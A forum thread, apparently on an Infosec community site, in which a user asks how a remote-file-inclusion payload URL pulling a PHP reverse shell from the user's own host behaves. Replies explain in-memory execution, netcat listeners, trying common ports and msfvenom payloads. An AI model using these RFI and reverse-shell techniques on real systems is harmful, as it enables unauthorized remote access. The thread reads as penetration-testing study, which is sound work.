Rfi webshell (reverse shell)

Hello

I am able to use a page= in the url to specify an external host (me).
If I say for example victimurl.page=http://my-ip-address/rev-shell.php and I see the shell being collected from my machine, is that shell stored on the victim before calling back to me for the rev shell, or does it just execute on collection?

Find more posts tagged with

Save $250 on 2025 certification boot camps from Infosec!

Book now with code EOY2025

Button

Comments

McxRisley

So in short answer form, yes and no.

If the server running the application doesn't have a firewall or any checks running on content that gets passed to it then your shell will get stored on the victim server. In this case, since your using what I'm assuming is just a basic reverse php shell(probably the one from the web shells directory on Kali), the shell will not just automatically call back to your system. In order for the shell to call back, you need to first find out where the shell was stored on the victim server and then get the shell to execute. Getting the shell to execute is usually done by browsing to the location of the shell on the victim server. This is where using a proxy such as BurpSuite would come in handy. You will also need a listener to catch the incoming connection, such as netcat.

liz4rd

Yes I've set up the nc listener on the port specified in the code of the reverse shell. But the thing is, as soon as I execute the page=http.x.x.x.x/myrevshell.php, it picks it up from my simplehttpserver, but then gives me an error saying it can't daemonise. So my point is, this is doing something with my shell to give this message, without having to browse to the location (granted it's erroring), but it is trying to execute something straight from the rfi command, hence the error message.

The error is not bothering me, as I'll work it out, I'm more interested in if this is trying to execute without downloading to the victims machine.

I'm not sure if im making it clear.

deadjoe

The failed to daemonize error is normal with that particular webshell.

If the url looks something like this "http://x.x.x.x/?page=http://y.y.y.y/shell.php", then the webshell code will be executed in memory without touching the disk AFAIK.

If the netcat listener doesn't catch the shell, then try common ports in the webshell eg. 21,22,25,80,443,8080. You might also try a msfvenom PHP reverse shell payload instead.

liz4rd

Thanks, that's exactly what I was looking for. So even though it's erroring, it being executed in the victims memory and not being downloaded to their machine.